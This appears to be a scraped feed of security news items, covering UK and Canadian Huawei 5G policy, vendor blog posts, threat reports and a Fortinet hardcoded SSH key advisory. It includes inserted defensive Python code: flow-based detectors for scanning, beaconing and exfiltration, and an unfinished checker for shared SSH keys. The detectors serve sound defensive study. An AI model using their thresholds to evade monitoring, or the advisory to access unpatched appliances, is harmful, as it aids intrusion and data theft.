Bell and Telus, which use Huawei equipment in their 4G access networks, are waiting for a decision from Ottawa.

A number of national security experts have warned Ottawa that allowing Canadian carriers to buy 5G equipment from Chinese manufacturers would be a security risk in part because of Chinese law that mandates companies there work with its intelligence agencies. Against that Huawei says the Canadian division isn’t subject to Chinese law. At the same time IT security experts say any threat by Chinese telecom gear can be mitigated because governments already have to think about possible hacks of equipment from any manufacturer.

The U.S. and Australia have banned their carriers from buying 5G equipment from Chinese manufacturers.



In a decision released this morning, the government defied warnings from the United States that allowing U.K. carriers to buy any 5G equipment from Chinese manufacturers will be a security risk and a decision that could imperil its position in the Five Eyes intelligence-sharing co-operative.

In its statement — which doesn’t specifically mention Huawei — the U.K. government set out restrictions carriers must obey when purchasing equipment from what are deemed high-risk vendors. High-risk vendors are defined as those which pose greater security and resilience risks to U.K. telecoms networks.

High-risk vendors are excluded from sensitive ‘core’ parts of 5G and gigabit-capable networks, including safety-related and safety-critical networks in Critical National Infrastructure. They are also cut out of “sensitive geographic locations, such as nuclear sites and military bases.”

There is also now a 35 per cent cap on high-risk vendor access to the access parts of those networks, meaning pieces like cellular antennas. Legislation enforcing the decision will be introduced soon.

Meanwhile, the U.K. National Cyber Security Centre has issued guidance to carriers to implement the decision.

Huawei UK chief Victor Zhang issued a statement saying “Huawei is reassured by the UK government’s confirmation that we can continue working with our customers to keep the 5G rollout on track. This evidence-based decision will result in a more advanced, more secure and more cost-effective telecoms infrastructure that is fit for the future. It gives the UK access to world-leading technology and ensures a competitive market.”

Canadian telecom consultant Mark Goldberg said that “I hope Canadian officials complete a thorough review of the issues and reach a conclusion based on facts and evidence, free of political interference.”

John Strand, a U.K.-based telecom analyst, said in a note that the British decision limits the amount that Huawei can sell in the U.K. It also means that UK operators will have to prioritize network upgrades in the Western part of the country where Huawei equipment is largely deployed.

“Overall, the UK policy will send a strong signal to the rest of Europe and the world that the use of Chinese equipment poses a security risk and should be limited,” Strand wrote. “The UK new policy is a step in the right direction, and it underscores the need for greater scrutiny of technology from firms owned and/or affiliated with the Chinese government.”

Dimitris Mavrakis, research director at tech market advisory firm ABI Research, said the U.K. ruling “is extremely good news for Huawei.” The firm is “thrilled” that the government took advice from security advisors and didn’t submit to “pressure induced by geopolitical tactics … The decision is a good compromise between alleviating these ‘security’ concerns and making sure that the 5G UK market is not harmed.”

Developing …


Ryuk and Sodinokibi Surge as Ransom Payments Double

More Sophisticated Gangs Increasingly Target Large Enterprises, Coveware Warns

Bad news on the ransomware front: Victims that choose to pay attackers' ransom demands - in return for the promise of a decryption tool - last quarter paid an average of $84,116, according to Coveware. But gangs wielding Ryuk and Sodinokibi - aka REvil - often demanded much more.

Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. Increasing IT complexity is one of the main factors in the adoption of NTA tools – growing infrastructure, the rise in hybrid and multi cloud deployments, employees accessing the network from any device and any location, and a large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well – use of stolen credentials, threats hiding in encrypted traffic, the rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been in the market more than 17 years. And here are some things that make it the market leading NTA solution:

Broad dataset

Stealthwatch has always relied on network meta data such as NetFlow to feed into its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. It’s because they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere. And this approach leaves you with a lot of blind spots. That’s why we offer an agentless deployment to customers using built-in functionality in your network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network so that your security scales automatically with your growing network.
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of web traffic being encrypted [1] and more than 70% of threats in 2020 predicted to use encryption [2], this is a major attack vector and it’s no longer feasible to rely on decryption-based monitoring.
  • And lastly, instead of throwing out random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response, and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.
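The "behavioral models reduced to kill-chain alerts" idea above is easier to judge with a concrete instance. What follows is an added example written for this page, not Stealthwatch's analytics: three small behavioural rules over NetFlow-style metadata (timestamp, source, destination, destination port, bytes out), each mapped to a kill-chain stage, run on constructed flow records. The thresholds (10 ports in 60 s, 8 connections with under 10% timing jitter, 10 MB and 20x a host's other destinations) are assumed tuning values, and the IP addresses are documentation ranges.

```python
"""Kill-chain detections from flow metadata only (added example, not vendor code).

Each rule looks only at who talked to whom, when, on which port and how much,
which is exactly what NetFlow-style telemetry gives a SOC without payload.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (timestamp_s, src, dst, dst_port, bytes_out)
FLOWS = []


def _add(ts, src, dst, dport, nbytes):
    FLOWS.append((ts, src, dst, dport, nbytes))


# 10.0.0.5: ordinary browsing, irregular timing, small uploads (benign baseline).
t = 0
for i, gap in enumerate([0, 37, 120, 44, 900, 15, 300, 61, 200, 75]):
    t += gap
    _add(t, "10.0.0.5", "93.184.216.34", 443, 2000 + 300 * i)

# 10.0.0.7: touches twelve ports on one internal host within a few seconds.
for i, port in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3389, 8080]):
    _add(1000 + i, "10.0.0.7", "10.0.0.20", port, 60)

# 10.0.0.9: contacts one external host every 60 s like clockwork, plus some browsing.
for k in range(12):
    _add(2000 + 60 * k, "10.0.0.9", "203.0.113.10", 443, 300)
for ts in (2010, 2150, 2500):
    _add(ts, "10.0.0.9", "93.184.216.34", 443, 4000)

# 10.0.0.11: pushes 48 MB to a single external host, dwarfing its other destinations.
for k in range(4):
    _add(3000 + 100 * k, "10.0.0.11", "198.51.100.7", 443, 12_000_000)
_add(3050, "10.0.0.11", "93.184.216.34", 443, 3000)
_add(3150, "10.0.0.11", "93.184.216.34", 443, 3000)
_add(3250, "10.0.0.11", "192.0.2.44", 80, 5000)


def detect_recon(flows, min_ports=10, window=60):
    """Reconnaissance: one src hits >= min_ports distinct ports on one dst within `window` seconds."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport, _ in flows:
        by_pair[(src, dst)].append((ts, dport))
    alerts = []
    for (src, dst), recs in by_pair.items():
        recs.sort()
        for start, _ in recs:  # slide a window starting at each record
            ports = {p for ts, p in recs if start <= ts <= start + window}
            if len(ports) >= min_ports:
                alerts.append((src, dst, len(ports)))
                break
    return alerts


def detect_beaconing(flows, min_count=8, max_jitter=0.1):
    """Command-and-control: regular intervals to one dst:port (gap coefficient of variation < max_jitter)."""
    by_key = defaultdict(list)
    for ts, src, dst, dport, _ in flows:
        by_key[(src, dst, dport)].append(ts)
    alerts = []
    for (src, dst, dport), times in by_key.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) < max_jitter:
            alerts.append((src, dst, dport, round(mean(gaps))))
    return alerts


def detect_exfiltration(flows, min_bytes=10_000_000, ratio=20):
    """Exfiltration: one destination receives far more from a host than all its other destinations."""
    per_host = defaultdict(lambda: defaultdict(int))
    for _, src, dst, _, nbytes in flows:
        per_host[src][dst] += nbytes
    alerts = []
    for src, dsts in per_host.items():
        if len(dsts) < 2:
            continue  # no peer destinations to compare against
        top = max(dsts, key=dsts.get)
        others = [v for d, v in dsts.items() if d != top]
        if dsts[top] >= min_bytes and dsts[top] > ratio * mean(others):
            alerts.append((src, top, dsts[top]))
    return alerts


def kill_chain_alerts(flows):
    """Reduce raw flows to a handful of alerts, each labelled with its kill-chain stage."""
    return {
        "reconnaissance": detect_recon(flows),
        "command-and-control": detect_beaconing(flows),
        "exfiltration": detect_exfiltration(flows),
    }


if __name__ == "__main__":
    for stage, found in kill_chain_alerts(FLOWS).items():
        print(stage, found)
```

Thirty-odd flow records collapse to three alerts, one per stage, and the benign host produces none: its timing is irregular enough to fail the beaconing test and it has only one destination. The rules are deliberately transparent so an analyst can see why each alert fired, which is the property to ask for before trusting any vendor's "AI and ML" claims.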

Multi cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers like Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP). And again, the deployment is agentless without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoint, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other threat response-enabled technologies, all in one console, with one click. This lowers the time required to triage and respond to these alarms.

Stealthwatch is also integrated with the firewall through the Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of top 20 US banks, and 14 of top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at:

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event or come check out a Stealthwatch demo within the Security area at World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016

The post Time for Some Straight Talk Around Network Traffic Analysis appeared first on Cisco Blogs.

Google Receives Geofence Warrants

Sometimes it's hard to tell the corporate surveillance operations from the government ones:

Google reportedly has a database called Sensorvault in which it stores location data for millions of devices going back almost a decade.

The article is about geofence warrants, where the police go to companies like Google and ask for information about every device in a particular geographic area at a particular time. In 2013, we learned from Edward Snowden that the NSA does this worldwide. Its program is called CO-TRAVELLER. The NSA claims it stopped doing that in 2014 -- probably just stopped doing it in the US -- but why should it bother when the government can just get the data from Google?

Both the New York Times and EFF have written about Sensorvault.

IDG Contributor Network: The next casualty of cyberwar could be your business

How do you prepare for truly unknown cyberattacks or threats to physical security?

It’s a question that we all have to ask in the aftermath of the missile strikes exchanged with Iran. As many are (rightly) concerned with the possibility of a traditional war starting in the Middle East, it is likely that retaliation will happen over cyberspace, putting all our networks and infrastructure at risk.

What’s most worrisome about these initial strikes is the lack of transparency. Most members of Congress had no idea the attack was imminent, and when they were briefed, many complained that their questions went unanswered.

If Congress isn’t being told what is happening, you can be sure the CISOs of major corporations aren’t being told or aware of any incidents that could have life-altering physical and cyber consequences. So with no possible coordination, how can you possibly be prepared?

To read this article in full, please click here

Zoom Bug Could Have Let Uninvited People Join Private Meetings

If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio, video, and documents shared throughout the session. Besides hosting password-protected virtual

Suspected Magecart Hackers Arrested in Indonesia


Three men have been arrested in Indonesia in a region-wide crackdown on gangs using the infamous Magecart digital skimming code, according to Interpol.

The law enforcement organization worked with private sector partner Group-IB to identify and analyze hundreds of e-commerce websites around the world infected with the malicious JavaScript.

Its Operation Night Fury saw Interpol’s central ASEAN Cyber Capability Desk send reports to police in the affected countries, including six in southeast Asia.

One of these was Indonesia, where three men were arrested on suspicion of running Magecart C&C servers there.

According to Interpol, the suspects are thought to have been using the stolen card details to buy luxury goods and electronics and then resell them to launder their profits.

Singaporean police have also been able to disable two further C&C servers following intelligence gleaned from the operation, while investigations in other ASEAN countries are ongoing, Interpol said.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyber threat landscape,” said Interpol director of cybercrime, Craig Jones.

“This successful operation is just one example of how law enforcement is working with industry partners, adapting and applying new technologies to aid investigations, and ultimately reduce the global impact of cybercrime.”

This could well be the first time Magecart hackers have been arrested by police. Digital skimming code is now used by multiple groups around the world, making it harder for police to tackle.

The news comes just weeks after Interpol celebrated another win: a public-private partnership with Trend Micro led to the identification of over 20,000 routers in southeast Asia infected with crypto-mining malware.

Thanks to Operation Goldfish Alpha, police managed to reduce this number by 78% and efforts are continuing to identify the remaining compromised devices.

LoRaWAN Encryption Keys Easy to Crack, Jeopardizing Security of IoT Networks

New research from IOActive has found that “blindly” trusting the encryption of the widely adopted device protocol can lead to DDoS, sending of false data and other cyber attacks.

How will Cyber Essentials changes affect you?

In April, there will be a major change to the way the Cyber Essentials scheme is administered.

From 1 April 2020, in a move to standardise the requirements for Cyber Essentials certification, the National Cyber Security Centre (NCSC) will drop four of its accreditation bodies in favour of the IASME Consortium (IASME), which will operate as the sole accreditation body for the Cyber Essentials scheme.

The NCSC is the authority for appointing Cyber Essentials accreditation bodies on behalf of HMG.

How will this affect certification applications/renewals?

  • All existing certification bodies will continue to operate as normal until 31 March 2020.
  • Applicants should apply for new certification/renewal under the current scheme’s requirements through any existing certification body.
  • Certificates issued from applications that were submitted before 1 April 2020 will be valid for at least 12 months.
  • If you apply for new or renew your Cyber Essentials certification with your existing certification body by 31 March 2020, you will have until 30 June 2020 to complete the application process (provided the application was started by 31 March and is being actively progressed).
  • All existing structures that were put in place under the current scheme to obtain certification will remain valid until 31 March 2020.
  • Vulnerability scans that were required under CREST-accredited certification bodies will still be required for applications purchased before 31 March 2020.

From 1 April 2020, any organisation that wants to apply for Cyber Essentials or renew their certification will need to follow the new process as required by IASME.

What can you expect from the new process after 31 March 2020?

  • All certification processes will be standardised through IASME.
  • Vulnerability scans that were required by certain certification bodies will no longer form part of the requirements for Cyber Essentials basic certification.
  • All Cyber Essentials applications and renewals will need to be completed using the IASME self-assessment questionnaire.
  • The questionnaire requires applicants to answer open-ended questions in free text format.
  • All applications need to be manually reviewed by an assessor. The open-ended free text format could lead to a lengthier and more onerous certification review process than the existing CREST questionnaire.
  • All renewals administered through IASME will be treated similarly to new applications, meaning data for Cyber Essentials assessments will need to be entered from scratch.
  • IT Governance customers will still be able to access their completed Cyber Essentials applications in the IT Governance Cyber Essentials portal, but we will not be able to transfer any data to IASME.

We urge customers to renew their certifications before 31 March 2020, even if it means bringing forward their certifications, to avoid having to start the process from scratch.

What about Cyber Essentials Plus?

  • All Cyber Essentials Plus applications continue as normal until 31 March 2020.
  • From 1 April, Cyber Essentials basic certification will be a prerequisite of Cyber Essentials Plus. Customers will be required to achieve the basic level first, followed by the Cyber Essentials Plus element, which must be completed within a mandatory three-month period and could incur additional charges.

Save yourself the hassle by securing early certification renewal

As we are a CREST-accredited certification body, you can fast-track your renewal through the IT Governance online portal before 31 March and reap the benefits of a simple, fast and convenient process.

Renewing your certification with IT Governance before the IASME-controlled process begins has many benefits:


Get certified or renew your certification now. 


The post How will Cyber Essentials changes affect you? appeared first on IT Governance UK Blog.

Facial recognition firm sued for scraping 3 billion faceprints

A potential class action says Clearview AI is breaking biometrics privacy law by ransacking social media so police can match photos with IDs.

The 2020 Annual Threat Report Blog

Estimated reading time: 2 minutes

As the enterprise security brand of Quick Heal Technologies Ltd., Seqrite develops security management products across endpoints, mobile devices, servers and networks. By building upon our data on threat research, intelligence and cybersecurity, our recently released Annual Threat Report 2020 aims to provide a detailed understanding of the malware of 2019.

While the full report can be found on this link, here is a brief summary of the most significant findings from the report:

Malware infection continues to be a threat

Seqrite detected over 146 million malware in 2019, a massive number. The highest detection of malware happened in Q4 2019, which saw 46 million malware detected. The peak hourly malware detection count for 2019 was 16,732.

Trojan continues to be a danger

In terms of category-wise malware detection statistics, Trojan malware continued to remain popular with just above 25 million detections in 2019. It remained a threat throughout the year, seeing a major upsurge in the last quarter.

Q4 sees a spike in malware

From the data, it is quite evident that malware sees a pronounced spike towards the end of the year. Seqrite detected 46 million malware in Q4, compared to a little above 35 million in Q3, 30 million in Q2 and 25 million in Q1. November and December 2019 also saw the largest number of malware attacks with over 18 million detected in December and above 14 million detected in November.

Real-Time Scan remains a big plus

In terms of malware detection, Real-Time protection methodology is a clear winner and a big differentiator. 51% of malware was detected through Real-Time Scan while the second most effective methodology was Behavioral Detection Scan with 23%. On-Demand Scan came a close third with 22%.

The topmost detected malware

The data showed that the following malware were detected the most on business endpoints:

  • Pioneer.CZ1 was the most detected malware, found on 22% of endpoints. It is a file infector which performs malicious activities and reports to a C&C server.
  • Sality.U was detected on 13% of endpoints and is a file infector which performs a range of harmful activities, including stealing confidential data from the system.
  • KillAv.Dr was detected on 12% of endpoints, stealing IP information and other personal data.


The manufacturing sector remains at highest risk

The manufacturing sector saw the highest number of malware attacks in 2019 with over 8 million detections. The education and the professional sectors were second and third on the list with over 7 million and around 6 million attacks, respectively.

APT attacks will continue

The Annual Threat Report 2020 also has a detailed section on Advanced Persistent Threats (APTs) which are designed to infiltrate high-value targets important to national governments such as the military, power grids, nuclear plants, etc. APTs are typically used by nation-states for cyber warfare.

Seqrite analyzed two APT attacks against important Indian government organizations in 2019. Operation m_project is a long-running cyber-espionage campaign against Indian government organizations since 2015 and targets defence organizations, government media houses and protection & security organizations.

Seqrite Labs also analyzed the alleged cyber-attack on a Nuclear Power Plant in India and tried to decipher the modus operandi. The incident raised huge questions on the security aspects of critical national infrastructure and it was alleged that an infamous group from North Korea was behind the attack. Seqrite Labs hypothesized that the targeted attack could have been carried out by spear-phishing emails.

Be sure to read the full report for more details on the key findings mentioned in the report. Seqrite continues to be the leading source for the most relevant threat intelligence in the world of enterprise security.

The post The 2020 Annual Threat Report Blog appeared first on Seqrite Blog.

Cyber Threat Trends Dashboard

Marco Ramilli published the Cyber Threat Trends Dashboard, a useful tool that will allow us to better understand most active threats in real time.


Information sharing is one of the most important activities that cybersecurity researchers do on a daily basis. Thanks to “infosharing” activities it is possible to block or, in specific cases, to prevent cyber attacks. Most of the infosharing activities in cybersecurity are focused on Indicators of Compromise such as URLs, IPs, domains and file hashes, which are used to arm protection tools such as proxies, ng-firewalls and Antivirus Engines.

Cyber Threat Trends Dashboard

Collecting and analyzing publicly available samples every single day, I became more and more interested in the evolution of cyber threats (Cyber Threat Trends) rather than in specific single analyses, which, after hundreds of them, can get boring (no more emotion in analyzing the next Ransomware or a new Emotet version 😛 ). APT is another cup of tea (a lot of passion in understanding the next steps there). So I decided to develop a super simple dashboard showing in real time (as soon as I get analyses done) the threat trends observed over days. The dashboard is available HERE (on the top menu TOOLS => Cyber Threat Trends). So far only a few basic pieces of information are shown; if you would like to see more stats/graphs/info, please feel free to contact me (HERE).


The aim of this dashboard is to monitor trends over thousands, even millions, of samples, providing quantitative analyses of what has been observed during the automatic analyses. The data in this dashboard is totally auto-generated without control and with no post-processing. You should consider it raw data from which you can start your own research and to which you can apply your own filters or considerations. If you do that, you should be aware that false positives could be around the corner. Let’s move on to the current graphs and try to explain what I’d like to show with them, but before getting in you should be aware that all the digits on the graphs express percentages and not absolute numbers. Now let’s dig a little bit into them.

Cyber Threat Trends Dashboard
  • Malware Families Trends. Detection distribution over time; in other words, the time frames in which specific families are most active with respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples are not classified in terms of family; this happens when no signature matches the sample or when multiple family signatures match the same sample. In both cases I am not sure which family the sample belongs to, so it is classified as “unknown” and not visualized on this graph. The missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the file’s magic bytes, this graph tracks the percentages of file types that Malware used as carriers.
  • Threat Level Distribution. From 0 to 3 it gets more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand whether Malware or false positives hide within the unknown families. For this reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of the last 300 analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in those fields, meaning you could probably find as TOP domain “” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and brought to your attention. Same cup of tea with processes and file names. Indeed those fields include the term “involved” in their title: if something is involved it does not mean that it is malicious, but that it is accounted to be in a malicious chain.


The dashboard introduced here is part of my contribution to the cybersecurity community, like every free tool released in the “Tools” menu box. Cyber Threat Trends evolves dynamically over time and you might find it useful for asking questions about live statistics on cybersecurity threats. If you are a journalist or a cybersecurity enthusiast you might find some answers to trending questions to be elaborated over time.

The Cyber Threat Trends Dashboard is available on Marco Ramilli’s blog at the following URL:

Pierluigi Paganini

(SecurityAffairs – Cyber Threat Trends Dashboard, cybersecurity)

The post Cyber Threat Trends Dashboard appeared first on Security Affairs.

Staff Send 130+ Emails Per Week to Wrong Recipient

Staff in large enterprises send 136 emails per week to the wrong person, according to new data from Tessian released to coincide with today’s Data Protection Day.

The annual event was launched 13 years ago by the Council of Europe to recognize the date in 1981 on which signatures were invited for Convention 108, the first legally binding international treaty on data protection.

However, despite the introduction of the GDPR nearly two years ago and the filing of over 160,000 breach notifications in the intervening period, poor data protection practices still appear to be rife.

Analyzing data from its global network of clients, Tessian claimed that corporate data is sent to unauthorized or personal email accounts nearly 200,000 times a year, for enterprises of 10,000 employees and up.

For large businesses of 1000 employees, the figure is nearly 20,000, while it drops again to around 5000 for SMBs.

Tessian CEO, Tim Sadler, claimed that human error is still the leading cause of breaches today — whether staff are deliberately breaking the rules or simply being negligent.

“Everyone has an email blunder story. After all, the average worker spends over a third of their working-week on email, so mistakes are bound to happen. But we’re seeing serious repercussions beyond just embarrassment over cc-ing the wrong person – more people are exposing personal and corporate data,” he added.

“These mistakes could see your data falling into the wrong hands and your company facing the regulator’s wrath under GDPR.”

Also known as Data Privacy Day in the US and elsewhere, the event is an opportunity to raise awareness among consumers and businesses of their respective online rights and responsibilities regarding data protection.

The GDPR has already done much to promote these within the EU and beyond, the European Commission claimed in a statement issued to mark the occasion.

“According to Eurobarometer results, the highest levels of awareness among citizens are recorded for the right to access their own data (65%), the right to correct the data if they are wrong (61%), the right to object to receiving direct marketing (59%) and the right to have their own data deleted (57%),” it revealed.

“Our priority and that of everyone involved should be to foster a harmonized and consistent implementation of data protection rules throughout the EU.”

However, the legislation remains a work in progress, according to Dob Todorov, CEO of HeleCloud.

“In truth, a chasm exists between the legal language used and the IT implementation needed to support it. And, while this chasm exists, some businesses will fail to meet the data protection standards that this regulation promotes — either accidentally or through the abuse of the grey areas,” he argued.

“As regulators look to hand out more fines, they should also focus on providing pragmatic and clear guidance at a technical level, without discriminating against current or future technologies.”

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

UK’s IoT Law Hopes to Drive Security-by-Design

The UK government has unveiled a new consumer IoT law designed to prohibit the sale of smart products that fail to meet three strict security requirements.

Drawn up by the Department for Digital, Culture, Media and Sport (DCMS), the proposals would ensure all IoT kit sold in the UK allows users to set unique passwords and not revert them to any factory settings.

This would seem to combat the scourge of Mirai-like malware, which finds exposed devices on the internet and cracks them open with a list of popular default password choices.

Manufacturers of IoT devices would also have to provide a public point of contact so that anyone can report vulnerabilities and have them acted on “in a timely manner.”

The same IoT kit-makers would have to explicitly state the minimum length of time a device will receive security updates at point-of-sale, allowing consumers to decide whether they’re happy with vendor promises.

However, there’s no mention of enforcing a 'kitemark' for consumers which would allow buyers to easily spot whether products have met a minimum standard of security and quality. Such a standard technically exists in the UK, after the British Standards Institution (BSI) introduced one in May 2018, and at a European level, with the launch of ETSI TS 103 645 around a year ago.

It’s also unclear exactly how the UK would prohibit the sale of non-compliant IoT kit, especially items which can be sourced online from China and elsewhere. The majority of the world’s smart gadgets are not manufactured in the UK.

That said, the UK is still ahead of the US in its moves to drive regulation of an industry that exposes consumers and businesses to growing cyber risk.

“Consumer IoT devices can deliver real benefits to individuals and society, but techUK’s research shows that concerns over poor security practices act as a significant barrier to their take-up. TechUK is therefore supportive of the government’s commitment to legislate for cybersecurity to be built into consumer IoT products from the design stage,” argued techUK director of markets, Matthew Evans.

“TechUK has been working on these three principles for the past four years. We support the work to ensure that they are consistent and are influencing international standards.”

Carl Wear, head of e-crime at Mimecast, claimed that the UK push could have a beneficial impact on other parts of the world, although the nature of technology innovation would require revisions to the law.

“The legislation and any accompanying guidance will then need to be re-visited rapidly and updated to maintain an adequate minimum standard of security, as necessary,” he said. “I am certain that this move by the UK will likely prompt consideration of further regulation within other jurisdictions, in order to maintain trust in their own IoT and parity with the security of others.”

The UK’s proposals follow a “world first” voluntary code of practice introduced by the government in October 2018, on which the European standard was based.

5 Ways Your Organization Can Ensure Improved Data Security

Each year on January 28, the United States, Canada, Israel and 47 European countries observe Data Privacy Day. The purpose of Data Privacy Day is to inspire dialogue on the importance of online privacy. These discussions also seek to inspire individuals and businesses to take action in an effort to respect privacy, safeguard data and […]… Read More

The post 5 Ways Your Organization Can Ensure Improved Data Security appeared first on The State of Security.

Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM

The vendor Fortinet has finally released security patches to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Fortinet has finally released security updates to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Recently Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management product FortiSIEM that can be used by attackers to access the FortiSIEM Supervisor.

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser‘, and it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a condition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser‘ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

On January 15, Fortinet released a patch that removed the hardcoded public key in FortiSIEM.

Fortinet urges customers to install the patch for CVE-2019-17659, or to restrict access to FortiSIEM’s “tunneluser” port (19999). Users should upgrade to FortiSIEM version 5.2.7 and above.
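The defect described above is a public key that is identical across every install, with the matching private key recoverable from the firmware image, so one secret unlocks the whole fleet. A defender-side check for that class of problem is to collect the `authorized_keys` files of the relevant account from each appliance and flag any key that appears on more than one host. The block below is an added example, not Fortinet’s code or a FortiSIEM tool: the host names and key blobs are constructed (they are syntactically valid base64 but not real keys), and the fingerprint routine follows the OpenSSH `SHA256:` convention so its output can be compared with `ssh-keygen -lf` on real files.

```python
"""Added example (not Fortinet's or FortiSIEM's code): find SSH public keys
shared between hosts in a collected set of authorized_keys files.

The FLEET inventory and every key blob below are constructed; they are not
real keys and no fingerprint from the advisory is used.
"""
import base64
import hashlib
from collections import defaultdict

KEY_TYPES = {
    "ssh-rsa", "ssh-dss", "ssh-ed25519",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}

# Constructed inventory: host -> contents of one account's authorized_keys.
# siem-sup-1 and siem-sup-2 carry the same key; siem-sup-3 has a unique key
# behind an options field, as a restricted-shell deployment might.
FLEET = {
    "siem-sup-1": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfake1 tunneluser@vendor-image\n",
    "siem-sup-2": ("# managed file\n"
                   "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCfake1 tunneluser@vendor-image\n"),
    "siem-sup-3": ('restrict,command="/usr/bin/false" '
                   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIfake333 ops@laptop\n"),
}


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of sha256(key blob)."""
    raw = base64.b64decode(blob_b64, validate=True)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str):
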